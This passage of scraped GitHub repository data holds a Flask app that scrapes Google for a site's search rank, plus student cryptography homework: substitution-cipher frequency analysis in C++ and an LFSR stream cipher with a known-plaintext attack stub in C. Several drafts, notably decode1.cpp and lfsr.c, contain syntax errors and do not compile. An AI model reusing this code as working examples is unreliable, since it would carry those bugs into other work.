\"npm-cache\"}\n sources.append(source)\n mini_shasums = mini_shasums + shasums[basename] + \" *\" + basename + \"\\n\"\n source = {\"type\": \"file\",\n \"url\": \"data:\" + urllib.parse.quote(mini_shasums.encode(\"utf8\")),\n \"dest\": \"npm-cache\",\n \"dest-filename\": \"SHASUMS256.txt-\" + electron_version}\n sources.append(source)\n\n if \"dependencies\" in module:\n deps = module[\"dependencies\"]\n for dep in deps:\n child_sources = getModuleSources(deps[dep], seen, include_devel=include_devel)\n sources = sources + child_sources\n\n return sources\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Flatpak NPM generator')\n parser.add_argument('lockfile', type=str)\n parser.add_argument('-o', type=str, dest='outfile', default='generated-sources.json')\n parser.add_argument('--production', action='store_true', default=False)\n parser.add_argument('--recursive', action='store_true', default=False)\n args = parser.parse_args()\n\n include_devel = not args.production\n\n outfile = args.outfile\n\n if args.recursive:\n import glob\n lockfiles = glob.iglob('**/%s' % args.lockfile, recursive=True)\n else:\n lockfiles = [args.lockfile]\n\n sources = []\n seen = {}\n for lockfile in lockfiles:\n print('Scanning \"%s\" ' % lockfile, file=sys.stderr)\n\n with open(lockfile, 'r') as f:\n root = json.loads(f.read())\n\n s = getModuleSources(root, seen, include_devel=include_devel)\n sources += s\n print(' ... %d new entries' % len(s), file=sys.stderr)\n\n print('%d total entries' % len(sources), file=sys.stderr)\n\n print('Writing to \"%s\"' % outfile)\n with open(outfile, 'w') as f:\n f.write(json.dumps(sources, indent=4))\n\n\nif __name__ == '__main__':\n main()\n" } ]
1
anilabhadatta/rank_of_url_in_google_search
https://github.com/anilabhadatta/rank_of_url_in_google_search
48e2ca03ce3fc2218340f7df63b4b4a0077fab30
930e8339b9fa2c00cf6d49f2f8e7b42ac70316c2
344e0dd012a5cafef43f524a9a3c07dcf1af9518
refs/heads/main
2023-07-11T13:03:50.993094
2021-08-20T15:55:45
2021-08-20T15:55:45
398,325,004
2
0
null
null
null
null
null
[ { "alpha_fraction": 0.6039284467697144, "alphanum_fraction": 0.6147757172584534, "avg_line_length": 32.77227783203125, "blob_id": "30a6becaee3a892f31ced590876ef74a03a1cb95", "content_id": "f078e8fb0532439be4349b3507ee24677eb599d8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3411, "license_type": "no_license", "max_line_length": 154, "num_lines": 101, "path": "/main.py", "repo_name": "anilabhadatta/rank_of_url_in_google_search", "src_encoding": "UTF-8", "text": "from flask import Flask, render_template, Response, request, redirect, url_for\nimport requests\nfrom bs4 import BeautifulSoup\nfrom werkzeug.utils import secure_filename\nimport os\nfrom openpyxl import load_workbook\nfrom fake_useragent import UserAgent\nimport random\n\napp = Flask(__name__)\n\n\[email protected](\"/\")\ndef index():\n return render_template(\"index.html\", condition=False)\n\n\[email protected](\"/result/\", methods=['POST'])\ndef search():\n excel_file = request.files['file']\n file_name = secure_filename(excel_file.filename)\n file_path = os.path.join(app.config['UPLOAD_FOLDER'], file_name)\n excel_file.save(file_path)\n keyword_list, webpage_list, rank_list = [], [], []\n read_excel(file_path, file_name, keyword_list, webpage_list, rank_list)\n return render_template(\"index.html\", len=len(keyword_list), keyword_list=keyword_list, webpage_list=webpage_list, rank_list=rank_list, condition=True)\n\n\ndef read_excel(file_path, file_name, keyword_list, webpage_list, rank_list):\n print(\"Reading Excel\")\n excel_path = file_path\n work_book = load_workbook(excel_path, read_only=False)\n work_sheet = work_book[\"Sheet1\"]\n print(work_sheet.max_row+1)\n for row in range(2, work_sheet.max_row+1):\n keyword = work_sheet.cell(row=row, column=1)\n check_url = work_sheet.cell(row=row, column=2)\n rank_cell = work_sheet.cell(row=row, column=3)\n\n print(\"Searching :\", keyword.value, check_url.value)\n if keyword.value == None or check_url.value == None:\n print(\"Skipping , invalid parameters\")\n rank = \"-1,\"\n rank_cell.value = rank[:-1]\n pass\n else:\n rank = find_rank(keyword.value, check_url.value)\n rank_cell.value = rank[:-1]\n\n keyword_list.append(keyword.value)\n webpage_list.append(check_url.value)\n rank_list.append(rank[:-1])\n\n newfile = os.getcwd()+\"\\\\\"+file_name\n work_book.save(newfile)\n os.remove(file_path)\n\n\ndef find_rank(keyword, check_url):\n #proxies = ['14.140.131.82:3128']\n #proxy = random.choice(proxies)\n #print(proxy)\n number_result, rank = 100, 1\n ua = UserAgent()\n url = \"https://www.google.com/search?q=\"\n keyword = keyword.replace(\" \", \"+\")\n url = url + keyword + \"&num=\" + str(number_result)\n #page = requests.get(url,proxies={\"http\": proxy, \"https\": proxy},headers={\"User-Agent\": ua.random})\n page = requests.get(url)\n soup = BeautifulSoup(page.text, 'html.parser')\n result_div = soup.find_all(\n 'div', attrs={'class': 'ZINbbc xpd O9g5cc uUPGi'})\n rank_list_temp = \"\"\n\n # debugging html file\n # f = open(\"output.html\",'w',encoding=\"utf-8\")\n # f.write(page.text)\n # f.close()\n\n for div in result_div:\n try:\n link = div.find(\"a\", href=True)\n # print(link['href'][7:7+len(check_url)], rank)\n if link['href'][7:7+len(check_url)] == check_url:\n print(\"Found Website , Rank :\", rank)\n rank_list_temp += str(rank)+\",\"\n rank += 1\n except:\n pass\n return (rank_list_temp,\"Website not found\")[rank_list_temp == \"\"]\n\n\nif __name__ == \"__main__\":\n home_dir = os.path.expanduser(\"~\")\n UPLOAD_FOLDER = os.path.join(home_dir, \"upload\\\\\")\n app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n try:\n os.makedirs(UPLOAD_FOLDER)\n except:\n pass\n app.run(debug=True)\n" }, { "alpha_fraction": 0.8063380122184753, "alphanum_fraction": 0.8063380122184753, "avg_line_length": 55.79999923706055, "blob_id": "56aec4f5905e792f69010956b4a2732ddce259ad", "content_id": "e4a28935bf03deb48870f8dad799d206cf5d3030", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 284, "license_type": "no_license", "max_line_length": 185, "num_lines": 5, "path": "/README.md", "repo_name": "anilabhadatta/rank_of_url_in_google_search", "src_encoding": "UTF-8", "text": "# Rank of Website in Google Search Engine\n\nA simple Flask web application that uses requests and BeautifulSoup to search the keyword in Google search engine and find the rank of website provided along with keyword in excel file.\n\nActivate the env and run main.py to start the server.\n" } ]
2
goggalor1954/CSCI360
https://github.com/goggalor1954/CSCI360
47313234f67b357991cfa4ef2548726b32c36bd4
fad8c52ab1ebd6537942f4936ed33f0865a7d706
af5b4d709f05610b91d6a23e32ce8ec0a140b6ed
refs/heads/master
2021-01-23T21:59:46.100379
2017-10-25T13:11:42
2017-10-25T13:11:42
102,918,407
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7066037654876709, "alphanum_fraction": 0.7122641801834106, "avg_line_length": 22.53333282470703, "blob_id": "3078fd590aa5c19539aa697bf70c3a204df03864", "content_id": "478ca96f3536a58e023ba9a24afd68b10ca4229e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1060, "license_type": "no_license", "max_line_length": 126, "num_lines": 45, "path": "/Project_1/Final_Files/sol_sap.cpp", "repo_name": "goggalor1954/CSCI360", "src_encoding": "UTF-8", "text": "/*\nJames Roesemann\nCSCI360\nproject 1\nsol_sap.cpp\n\nopens and reads in a file named corpus_clean.txt\noutputs to corpus_freq.txt \ncorpus_freq.txt contains, in decending order, a row containing the pairs <letter>, <rel_freq> \nletter is a alphabetical or space character and rel_freq is a floting point number is the relitive frequency of its occurance.\n*/\n\n#include <iostream>\n#include <list>\n#include <fstream>\n#include \"charBox.h\"\n#include \"statAnalyzer.h\"\nusing namespace std;\n\t\n\nint main()\n{\n\n\tlist<charBox> alphaChars;\n\tbuildCharBox(&alphaChars);\n\tfstream infile, outfile;\n\tinfile.open(\"corpus_clean.txt\");\n\twhile(!infile.eof()){charCount( &alphaChars, infile.get());}\n\tinfile.close();\n\tsetFreq(&alphaChars, getTotal(alphaChars));\n\toutfile.open(\"corpus_freq.txt\", std::fstream::out | std::fstream::trunc);\n\tcharBox temp;\n\n\twhile(!alphaChars.empty()) \t\n\t{\n\t\ttemp=getHighest(alphaChars, 0, alphaChars.front().getName());\n\t\toutfile << temp.getName() << \", \"<< temp.getFreq() << endl;\n\t\tremoveCharBox( &alphaChars, temp.getName());\n\t}\n\toutfile.close();\n\n\t\n\n\treturn 0;\n}\n\n" }, { "alpha_fraction": 0.669099748134613, "alphanum_fraction": 0.6812652349472046, "avg_line_length": 17.266666412353516, "blob_id": "b020ba9dd15fd1f457fcdf27b803d48f8d060e3e", "content_id": "64e5e6bbab75de5a4e910f5702a9f6e97491d552", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 822, "license_type": "no_license", "max_line_length": 180, "num_lines": 45, "path": "/Project_1/Final_Files/charBox.h", "repo_name": "goggalor1954/CSCI360", "src_encoding": "UTF-8", "text": "#ifndef CHARBOX_H\n#define CHARBOX_H\n\n//A class conting the char variables name and cryptName, an int variable to count the occurance of the char, and a float variable to store the frequencey of the occuring character.\nclass charBox\n{\nprivate:\n\tint count;\n\tchar name, cryptName;\n\tfloat freq;\npublic:\n\tvoid add(){count=count+1;}\n\tvoid setName(char x){name =x;}\n\tvoid setCryptName(char x){cryptName=x;}\n\tvoid setFreq(int total){freq=float(count)/float(total);}\n\tint getCount(){return count;}\n\tchar getName(){return name;}\n\tchar getCryptName(){return cryptName;}\n\tfloat getFreq(){return freq;}\n\n\tcharBox()\n\t{\n\t\tcount =0;\n\t\tname='\\0';\n\t\tcryptName='\\0';\n\t\tfreq=0;\n\t}\n\tcharBox(char x)\n\t{\n\t\tcount=0;\n\t\tname=x;\n\t\tcryptName='\\0';\n\t\tfreq=0;\n\t}\n\tcharBox(char x, char y)\n\t{\n\t\tcount=0;\n\t\tname=x;\n\t\tcryptName=y;\n\t\tfreq=0;\n\t}\n};\n\n\n#endif\n" }, { "alpha_fraction": 0.701777458190918, "alphanum_fraction": 0.7142857313156128, "avg_line_length": 27.129629135131836, "blob_id": "84a4f3a7afb8698be4153ff9bb05c3e146be518c", "content_id": "11f1b6e43d8005117af58a5fe5577a55c3034414", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3038, "license_type": "no_license", "max_line_length": 201, "num_lines": 108, "path": "/Project_1/decode1.cpp", "repo_name": "goggalor1954/CSCI360", "src_encoding": "UTF-8", "text": "//james Roesemann\n//CSCI360\n//Project1\n\n#include <iostream>\n#include <fstream>\nusing namespace std;\n\nclass charBox\n{\n\tprivate:\n\tchar name;\n\tint count;\n\tcharBox *next;\n\t\n\tpublic:\n\tcharBox()\n\t{\n\t\tname='\\0';\n\t\tcount=0;\n\t\tnext=NULL;\n\t}\n\tcharBox(charBox &x)\n\t{\n\t\tname='\\0';\n\t\tcount=0;\n\t\tnext=&x;\n\t}\n\tchar getName(){return name;}\n\tint getCount(){return count;}\n\tcharBox getNext(){return *next;}\n\tvoid setName(char x){name=x;}\n\tvoid add(){count++;}\n\tvoid setNext(charBox &x){next=&x;}\n\tvoid setNext(){this->next=new charBox();} //set next to a newly created charBox pointer.\n};\nvoid charBuild(charBox &charBoxVar, int charVal) //recursivly assigns the the character name based of the value of charVal to name. creates a new charBox object and points to it. stops when charVal=z. \n{\n\tcharBoxVar.setName(charVal);\n\tif(charVal==90){return;}\n\tcharBoxVar.setNext();\n\tcharBuild(charBoxVar.getNext(), charVal++);\n}\nvoid charBuild(charBox &charBoxVar)//sets the first character variable to ' ' and begings the recursive fuiction charbuild.\n{\n\tcharBoxVar.setName(' ');\n\tcharBoxVar.setNext();\n\tcharBuild(charBoxVar.getNext(), 65);\n}\nvoid cryptoCharBuild(charBox &charBoxVar, int x) //recursivly builds 26 charBox objects to be filled later by another function.\n{\n\tif(x==26) return;\n\tcharBoxVar.setNext();\n\tcryptoCharBuild(charBoxVar.getNext(), x-++);\n}\nvoid charBoxCount(charBox &charBoxVar, char x) //counts how many times the given character occurs. if the charBoxVal for name == NULL, asigns the curent character to name.\n{\n\tif(charBox.getName()=='\\0'){charBox.setName(x)};\n\tif( x==charBoxVar.getName())\n\t{\n\t\tcharBoxVar.add();\n\t\treturn;\n\t}\n\tif(charBoxVar.getNext()=='\\0'){return;}\n\tcharBoxCount(charBoxVar.getNext(), x);\n}\nvoid readAlphaChars( charBox &charBoxVar) //reads in the characters of moby dick, counts A-z and the space character.\n{\n\tifstream inFile(\"MobyDick.txt\");\n\twhile(!inFile.eof())\n\t{ //need to make sure that lower case letters a read in as upercase letters.\n\t\tif(infile.get()<=122 && infile.get>=97)\n\t\t{\n\t\t\tcharBoxCount( charBoxVar, infile.get()-32)\n\t\t}//why 32 insted of 26? make sure that numbers right.\n\t\telse \n\t\t{\n\t\t\tcharBoxCount( charBoxVar, infile.get());\n\t\t}//not done here. i need to fix it so that if it's a lower case letter it becomes an upper case letter.\n\t}\n\tinFile.close();\t\n}\nvoid readCryptoChars(charBox &charBoxVar)//reads in the crypto text and counts the characters\n{\n\tifstream inFile(\"ciphertext.txt\");\n\twhile(!inFile.eof())\n\t{\n\t\tcharBoxCount(charBoxVar, infile.get());\n\t}\n\tinFile.close();\n};\n\t\n\nint main()\n{\n\tcharBox alphaChars;\n\tcharBox cryptoChars;\n\tcharBuild(alphaChars);\n\tcryptoCharBuild(cryptoChars, 0);\n\n\treturn 0;\n}\n\n\n/* Outline of what i need to do:\n- create a character object containing the character and a count variable. set the inittial character value to null. and a pointer to the next object.\n- create 2 27 length character object. one for a-z and ' '. \n- create another 27 length , but assign the character variable depending on whats read into it. stop at the 27th character. after that point to null.\n" }, { "alpha_fraction": 0.692169189453125, "alphanum_fraction": 0.7020702362060547, "avg_line_length": 22.595745086669922, "blob_id": "160665d44b12a1c6355340a1491f967d6869c4c7", "content_id": "c3de38947fa7bd5f15c1ab11188d48271c992d91", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1111, "license_type": "no_license", "max_line_length": 110, "num_lines": 47, "path": "/Project_1/Final_Files/sol_sac.cpp", "repo_name": "goggalor1954/CSCI360", "src_encoding": "UTF-8", "text": "/*\nJames Roesemann\nCSCI360\nproject 1\nsol_sac.cpp\n\nopens and reads in a file named ciphertext.txt\noutputs to cipher_freq.txt \ncipher_freq.txt contains, in decending order, a row containing the pairs <letter>, <rel_freq> \nletter is a printable ascii and rel_freq is a floting point number is the relitive frequency of its occurance.\n*/\n#include <iostream>\n#include <list>\n#include <fstream>\n#include \"charBox.h\"\n#include \"statAnalyzer.h\"\nusing namespace std;\n\nint main()\n{\n\tlist<charBox> alphaChars;\n\tbuildCharBox(&alphaChars);\n\tfstream infile, outfile;\n\tchar tempIn;\n\tinfile.open(\"ciphertext.txt\");\n\twhile(!infile.eof())\n\t{\n\t\ttempIn=infile.get();\n\t\tif(tempIn>=32 && tempIn<=126)\n\t\t{\n\t\t\tcharCount( &alphaChars, tempIn);\n\t\t}\n\t}\n\tinfile.close();\nsetFreq(&alphaChars, getTotal(alphaChars));\n\toutfile.open(\"cipher_freq.txt\", std::fstream::out | std::fstream::trunc);\n\tcharBox temp;\n\twhile(!alphaChars.empty()) \t\n\t{\n\t\ttemp=getHighest(alphaChars, 0, alphaChars.front().getName());\n\t\toutfile << temp.getName() << \", \"<< temp.getFreq() << endl;\n\t\tremoveCharBox( &alphaChars, temp.getName());\n\t}\n\toutfile.close();\n\n\treturn 0;\n}\n\n\n" }, { "alpha_fraction": 0.6614349484443665, "alphanum_fraction": 0.665919303894043, "avg_line_length": 24.485713958740234, "blob_id": "977a13550e6d5374e4a2a2f7b28282000a852c76", "content_id": "30b3ecd3c27c166b2707083bc42c4369f6a48056", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1784, "license_type": "no_license", "max_line_length": 153, "num_lines": 70, "path": "/Project_1/charBox-a.h", "repo_name": "goggalor1954/CSCI360", "src_encoding": "UTF-8", "text": "#ifndef CHARBOX_H\n#define CHARBOX_H\n\nclass charBox //A class conting a char variable, an int variable to count the occurance of the char, and a pointer that point to the next charBox object.\n{\n\tprivate:\n\tchar name;\n\tint count;\n\tcharBox* next;\n\t\n\tpublic:\n\tcharBox()\n\t{\n\t\tname='\\0';\n\t\tcount=0;\n\t\tnext=NULL;\n\t}\n\tcharBox(charBox &x)\n\t{\n\t\tname='\\0';\n\t\tcount=0;\n\t\tnext=&x;\n\t}\n\tchar getName(){return name;} //return the char value name\n\tint getCount(){return count;} //returns the int value count\n\tcharBox* getNext(){return next;} //returns the pointer valuse next\n\tvoid setName(char x){name=x;} //sets the char value name\n\tvoid add(){count++;} //increments the count value by 1\n\tvoid setNext(charBox &x){next=&x;} // sets the pointer value next to the entered charBox object.\n\tvoid makeNext()\n\t{\n\t\tcharBox* p = new charBox();\n\t\tthis->next=p;\n\t\t//this->next->next==NULL;\n\t}\n};\n\n\n\tvoid charBuild(charBox *charBoxVal, int x) // recursivly builds a charBox linked list of size x\n{\n\tif(x==0) return;\n\tcharBox p;\n\tcharBoxVal->setNext(p);\n\tcharBuild(charBoxVal->getNext(), x-1);\n\t//std::cout << \"This: \" << charBoxVar << std::endl; //test\n\t//std::cout << \"next: \" << charBoxVar->getNext() << std::endl; //test\n}\n\tvoid aplhaFill(charBox *charBoxVal, char x) // recursivly fills the name values of the entered charBox from A-Z\n\t{\n\t\tcharBoxVal->setName(x);\n\t\tstd::cout << x << std::endl;\n\t\tstd::cout << charBoxVal->getNext() << std::endl; //test\n\t\tif(charBoxVal->getNext()==NULL) return;\n\t\taplhaFill(charBoxVal->getNext(), x+1);\n\t}\n\n\tvoid aplhaFill(charBox *charBoxVal) //sets the first name value of charBoxVal to ' ', fills in the rest of the the alphabet A-Z\n\t{\n\t\tstd::cout << charBoxVal->getNext() << std::endl; //test\n\t\tcharBoxVal->setName(' ');\n\t\taplhaFill(charBoxVal, 'A');\n\t}\n\t\t\n\n\n\n\n\n\n#endif\n" }, { "alpha_fraction": 0.6468658447265625, "alphanum_fraction": 0.6729407906532288, "avg_line_length": 25.564220428466797, "blob_id": "04269b3ecfb7bd340371d888c3b55af16da7d22b", "content_id": "63c8f577c639f9ddf43470401650cd73afba5d47", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 5791, "license_type": "no_license", "max_line_length": 400, "num_lines": 218, "path": "/Project_2/project_2/lfsr.c", "repo_name": "goggalor1954/CSCI360", "src_encoding": "UTF-8", "text": "/*\nCode for 64 bit LFSR\nHunter Johnson\n9/15/17\n\nmodified by: James Roesemann\n10/12/17\n*/\n\n#include <stdint.h>\n#include <stdlib.h>\n#include <stdio.h>\n#include <assert.h>\n\n/*The following struct will represent an LFSR with a 64 bit state.\n The taps are represented by a 64 bit number, where the ith bit (from the right)\n corresponds to p_i (in the notation of the textbook).\n The uint64_t is a 64 bit unsigned integer.\n There is a small chance that this code may behave unexpectedly if compiled on Windows or Mac.\n Please let me know if you get issues.\n It compiles and runs under clang and gcc. */\ntypedef struct {\n\tuint64_t state;\n\tuint64_t taps;\n} LFSR;\n\nint parity(uint64_t N)\n{\n/* Return the parity of N*/\n\tint p = __builtin_parity(N); // parity of first 32 bits\n\tN = __builtin_bswap64(N); //move back 32 to the front\n\treturn (p+__builtin_parity(N))%2; //overall parity\n}\n\nint read_lfsr(LFSR* L)\n{\n/*Return the current output bit (the rightmost bit of the state variable) */\n\n\n/* You implement this*/\n\treturn L->state%2;\n\n}\n\nvoid next_state(LFSR* L)\n{\n/*Takes LFSR.\n Returns nothing.\n Side effect: advances L to next state.(shift to the right and replace leftmost bit with appropriate value)\n*/\n\n /* You implement this.\n Hint: make use of the parity() function provided above*/\n int lib=parity(L->state & L->taps);\n if(lib==1) L->state = (L->state >>1) | 0x8000000000000000;\n else L->state = (L->state >> 1);\n\n}\n\nvoid init_LFSR(LFSR* L, uint64_t initial_state, uint64_t taps)\n{\n/*Initialize with state and taps*/\n\tL->state = initial_state;\n\tL->taps = taps;\n}\n\n\nunsigned char get_stream_byte(LFSR* L)\n{\n/*Return one byte of keystream.\n Note that the byte fills up from left to right.\n*/\n\tunsigned char C = 0;\n\tint i = 7;\n\tfor(;i>=0;i--)\n\t{\n\t\t//printf(\"%d\\n\",read_lfsr(L));\n\t\tC |= (read_lfsr(L)<<i);\n\t\tnext_state(L);\n\t}\n\t//printf(\"\\t%d\\n\",C);\n\treturn C;\n}\n\nvoid encrypt(char* pt,char* ct,LFSR *L)\n{\n/*Use the LFSR stream cipher to encrypt\n the file named pt (plaintext) and write the\n output to the file named ct (ciphertext);\n*/\n\tFILE* PT = fopen(pt,\"r\");\n\tFILE* CT = fopen(ct,\"w\");\n\tassert(PT); //make sure files opened okay\n\tassert(CT);\n\tint c;\n\twhile((c=getc(PT))!=-1)\n\t{\n\t\tunsigned char sb = get_stream_byte(L);\n\t\tfputc(sb^c,CT);\n\t}\n\tfclose(PT);\n\tfclose(CT);\n}\n\nvoid decrypt(char* pt,char* ct,LFSR *L){\n/*Make sure L has been reset to the initial state*/\n\tencrypt(pt,ct,L);\n}\n\nvoid get_128_keystream_bits(char* ct,char* kpt)\n{\n/*This function takes 16 bytes of ciphertext and 16 bytes of\n known plaintext.\n The output is a file named \"key_stream.txt\" that contains 128 bits\n of keystream. The stream is represented in ASCII, with 128 lines, and\n either a \"0\" or a \"1\" on each line. */\n\n/*This is the plaintext attack in which you recover 2m keystream bits.\n\n You implement this.\n//idea for this. for loop to get the first 16 chatacter, maybe store them. combine them to a 64 bit int somehow in order. ah, i know. combine them into a word. no. i think you do an unsigned 64bit, shift by 8 and add the bytes fof the nex tcharacter. fill untill done. no. outoouting to a text file. i can just mod 2 to get the rightmost bit. store it. right shift, and when done output line by line/\n*/\n/*\ncreates an 8 value int array for stroage purposes.\nreads in 16 characters of ct and then kpt\nuses a for loop to get the rightmost bit, store it in the array and shift right untill the end of the character is reached. \noutputs the bit values one line at a time to the file \"key_stream.txt\"\n*/\n//i'm uncluar about what order i'm ment to output the bits. do i houtput the leftmost bit of the characters first or the rightmost bit? acoring to him leastsignificat bit first. ie rightmost bit.\n\tunsigned char C;\n\tFILE* CT = fopen(ct,\"r\");\n\tFILE* KPT = fopen(kpt,\"r\");\n\tFILE* KST = fopen(\"key_stream.txt\",\"wb\");\n\tassert(CT);\n\tassert(KPT);\n\tassert(KST);\n\t//read in 16 characters from ct, output their bit values to kst\n\tfor(int i=0; i<16; i++)\n\t{\n\t\tC = getc(CT);\n\t\t//output bits to key_stream.txt\n\t\tfor(int j=0; j<8; j++)\n\t\t{\n\t\t\tfputc(C%2, KST);\n\t\t\tfputc('\\n', KST);\n\t\t\tC=C >>1;\n\t\t}\n\t}\n\t//read in 16 characters from kpt, output their bit values to kst\n\tfor(int i=0; i<16; i++)\n\t{\n\t\tC = getc(KPT);\n\t\t//output bits to key_stream.txt\n\t\tfor(int j=0; j<8; j++)\n\t\t{\n\t\t\tfputc(C%2, KST);\n\t\t\tfputc('\\n', KST);\n\t\t\tC=C >>1;\n\t\t}\n\t}\n\tfclose(CT);\n\tfclose(KPT);\n\tfclose(KST);\n}\n\n\nvoid shape_keystream()\n{\n/* This function opens the file \"key_stream.txt\" created by\n get_128_keystream_bits(). It uses this data to create a file called\n \"S.mat.sage\" which is a 64x64 matrix of keystream bits of the form\n discussed in the project description. It also creates a vector\n (a 64x1 matrix) of keystream bits of the form described in the\n project description. This is stored in a file called \"V.mat.sage\" */\n\n //See the file matrix.sagews for examples of what the output should look like.\n\n /*You implement this*/\n}\n//function that gets the first 8 bytes of the plaintest, prints it to the screen inorder to set initial state. remove when done.\nvoid getFirstEight()\n{\n\tunsigned char C;\n\tuint64_t firstEight=0;\n\tFILE* PT = fopen(\"toy_pt.txt\",\"r\");\n\tfor(int i=0; i<8; i++)\n\t{\n\t\tC = getc(PT);\n\t\tfor(int j=0; j<8; j++)\n\t\t{\n\t\t\tprintf(\"%d\",C%2);\n\t\t\tfirstEight |= C%2;\n\t\t\tC = C>> 1;\n\t\t}\n\t}\n\tprintf(\"\\n\");\n\tfclose(PT);\t\n}\n//hex value of first 8 bytes of \n\n\nint main()\n{\n\tLFSR L;\n\t//uint64_t initial_state = 0xbeefcafebabecab1; //original initial state.\n\tuint64_t 0xF7DDFD2A16A6040A;\n\tuint64_t taps = 0xdeaddeedacedface;\n\tinit_LFSR(&L,initial_state,taps);\n\tencrypt(\"toy_pt.txt\",\"ct.dat\",&L);\n\tinit_LFSR(&L,initial_state,taps);\n\tdecrypt(\"ct.dat\",\"toy_ot.txt\",&L);\n\t//get_128_keystream_bits(\"target_ciphertext\",\"<you fill this in>\");\n\t//shape_keystream();\n\n//test\n\tgetFirstEight();\n\t//charTest('G');\n}\n" }, { "alpha_fraction": 0.5877193212509155, "alphanum_fraction": 0.6184210777282715, "avg_line_length": 12.411765098571777, "blob_id": "3122581ae72ed4fc2ab192af9d0220154ee70735", "content_id": "82145b4e5854b8a96bd83670464d386661b28e97", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 456, "license_type": "no_license", "max_line_length": 38, "num_lines": 34, "path": "/Project_1/decode2.cpp", "repo_name": "goggalor1954/CSCI360", "src_encoding": "UTF-8", "text": "//james Roesemann\n//CSCi360-01\n//Project 1\n#include <iostream>\n#include \"charBox.h\"\nusing namespace std;\n\n//test function\nvoid test(charBox* x, int y)\n{\n\tif(x->getNext()==NULL)\n\t{\n\t\treturn;\n\t}\n\tstd::cout << y << \": \" << &x << endl;\n\ttest(x->getNext(), y-1);\n\treturn;\n}\n\nint main()\n{\n\tcharBox alphaChar;\n\tcharBox cryptoChar;\n\tcharBuild(&alphaChar, 26);\n\t//charBuild(cryptoChar, 26);\n//test\n\ttest(&alphaChar, 30); //test\n\n\t//aplhaFill(& alphaChar);\n\t\n\n\n\treturn 0;\n};\n" }, { "alpha_fraction": 0.7174749970436096, "alphanum_fraction": 0.7251732349395752, "avg_line_length": 20.295082092285156, "blob_id": "9c8a750364ac84010570a757befbc4eb0ae8b4b5", "content_id": "6acf554f70c32f2fa4840736fe74918e6754be5c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1299, "license_type": "no_license", "max_line_length": 110, "num_lines": 61, "path": "/Project_1/Final_Files/sol_cracker.cpp", "repo_name": "goggalor1954/CSCI360", "src_encoding": "UTF-8", "text": "/*\nJames Roesemann\nCSCI360\nproject 1\nsol_cracker.cpp\n\nread in 3 files, ciphertext.txt, cipher_freq.txt, and corpus_freq.txt.\nOutputs the file cracked.txt.\ncracked is the result of replaceing each character of ciphertext.txt with a capital letter of space character.\nThe characters a replaced by occurance of frequency. this will not be a perfect decryption.\n*/\n\n#include <iostream>\n#include <list>\n#include <fstream>\n#include \"charBox.h\"\n#include \"statAnalyzer.h\"\nusing namespace std;\n\n\nint main()\n{\n\tfstream infile, outfile;\n\tlist<charBox> corresponding;\n\tchar temp1, temp2;\n\tstring temp;\n\n\tbuildCharBox(&corresponding);\n\tinfile.open(\"corpus_freq.txt\");\n\t//reads in the characters from corpus_freq.txt\n\twhile(getline(infile, temp))\n\t{\n\t\tcharCount(&corresponding, temp[0]);\n\t}\n\tinfile.close();\n\n\tinfile.open(\"cipher_freq.txt\");\n\t//reads in the characters from cipher_freq.txt\n\twhile(getline(infile, temp))\n\t{\n\t\tcryptInsert(&corresponding, temp[0]);\n\t}\n\tinfile.close();\n\tinfile.open(\"ciphertext.txt\");\n\toutfile.open(\"cracked.txt\", std::fstream::out | std::fstream::trunc);\n\t//reads in characters from ciphertext.txt. outputs the decrypted characters to cracked.txt\n\twhile(!infile.eof())\n\t{\n\t\tdecrypt(&corresponding, outfile, infile.get());\n\t}\n\tinfile.close();\n\toutfile.close();\n\t\n\n\t//test\n\n\n\t\n\t\t\n\treturn 0;\n}\n" }, { "alpha_fraction": 0.701684832572937, "alphanum_fraction": 0.7195242643356323, "avg_line_length": 27.02777862548828, "blob_id": "61fa4f7295c20916ee313fd9c9459405d962a8c2", "content_id": "f73ac7e294289d1cd6b1c97e9c6611367d735a5b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1009, "license_type": "no_license", "max_line_length": 180, "num_lines": 36, "path": "/Project_1/Final_Files/sol_cleaner.cpp", "repo_name": "goggalor1954/CSCI360", "src_encoding": "UTF-8", "text": "/*\nJames Roesemann\nCSCI360\nproject 1\nsol_cleaner.cpp\n\nOpens and reads in a file named corpus.txt\nOutputs a file name corpus_clean.txt\ncorpus_clean.txt Contains the same characters as corpus.txt, except all not-alphabetical or space characters have been removed, and all alphabetical characters have been capliized.\n\nI altered this slightly to count new lines as spaces because i noticed alot of words ended up geting combined and i was worried it would throw off the statistical analysis.\n*/\n#include <iostream>\n#include <fstream>\nusing namespace std;\n\nint main()\n{\n\tfstream infile, outfile;\n\tchar temp;\n\tinfile.open(\"corpus.txt\");\n\toutfile.open(\"corpus_clean.txt\" , std::fstream::out | std::fstream::trunc);\n\t\n\twhile(!infile.eof())\n\t{\n\t\tinfile.get(temp);\n\t\t//if the character is a lowercase letter, changers it to an upper case letter.\n\t\tif(temp<=122 && temp >=97){temp=temp-32;}\n\t\tif(temp=='\\n'){temp=' ';}\n\t\tif(temp<=90 && temp>=65 || temp==32){outfile << temp;}\n\t}\n\tinfile.close();\n\toutfile.close();\n\n\treturn 0;\n}\n" }, { "alpha_fraction": 0.6385786533355713, "alphanum_fraction": 0.6822335124015808, "avg_line_length": 21.730770111083984, "blob_id": "edc242c655f21597ba3e42e3f2b802ecba85b129", "content_id": "1c6ff8d57c51ad7a4cdc18be2fde08d55a1feb5f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 2955, "license_type": "no_license", "max_line_length": 179, "num_lines": 130, "path": "/Project_2/project_2/lfsr-dev.c", "repo_name": 